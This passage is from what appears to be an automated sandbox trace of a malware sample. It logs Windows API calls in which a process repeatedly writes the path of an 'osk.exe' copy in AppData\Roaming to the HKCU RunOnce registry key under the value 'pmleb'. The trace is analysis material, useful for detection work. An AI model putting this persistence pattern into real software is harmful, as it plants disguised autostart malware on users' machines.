HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.243] RegCloseKey (hKey=0x280) returned 0x0 [0086.244] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.244] SetTimer (hWnd=0x20280, nIDEvent=0x21d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d5 [0086.244] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.258] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.258] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.258] KillTimer (hWnd=0x20280, uIDEvent=0x21d5) returned 1 [0086.258] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.259] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.259] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.259] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.259] RegCloseKey (hKey=0x280) returned 0x0 [0086.259] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.259] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.259] SetTimer (hWnd=0x20280, nIDEvent=0x21d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d6 [0086.259] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.274] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.274] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.274] KillTimer (hWnd=0x20280, 
uIDEvent=0x21d6) returned 1 [0086.274] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.274] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.274] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.275] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.275] RegCloseKey (hKey=0x280) returned 0x0 [0086.275] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.275] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.275] SetTimer (hWnd=0x20280, nIDEvent=0x21d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d7 [0086.275] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.595] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.595] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.596] KillTimer (hWnd=0x20280, uIDEvent=0x21d7) returned 1 [0091.596] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.597] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.597] IUnknown:Release (This=0x787518) returned 0x1 [0091.598] GetCurrentThreadId () returned 0x544 [0091.598] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, 
rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.599] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.599] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.601] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, 
[2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.601] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.601] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0091.601] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.601] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5d [0091.601] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, 
dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.603] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5c [0091.603] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.603] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.603] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.603] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.604] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.604] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.604] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.605] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.605] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.605] 
RegCloseKey (hKey=0x280) returned 0x0 [0091.605] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.605] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.605] SetTimer (hWnd=0x20280, nIDEvent=0x21d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d8 [0091.605] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.609] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.609] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.609] KillTimer (hWnd=0x20280, uIDEvent=0x21d8) returned 1 [0091.609] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.609] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.609] IUnknown:Release (This=0x787518) returned 0x1 [0091.609] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.609] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.609] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, 
cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.610] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.610] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.610] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0091.610] 
FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.610] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5e [0091.610] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.611] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5d [0091.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.611] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.611] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.611] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.611] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 
out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.611] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.611] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.612] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.612] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.612] RegCloseKey (hKey=0x280) returned 0x0 [0091.612] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.612] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.612] SetTimer (hWnd=0x20280, nIDEvent=0x21d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d9 [0091.612] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.624] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.624] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.624] KillTimer (hWnd=0x20280, uIDEvent=0x21d9) returned 1 [0091.625] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.625] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.625] IUnknown:Release (This=0x787518) returned 0x1 [0091.625] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.625] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.625] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.625] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.626] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.626] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0091.626] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.626] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5f [0091.626] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, 
rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.627] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5e [0091.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.627] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.627] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.627] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.627] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.627] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 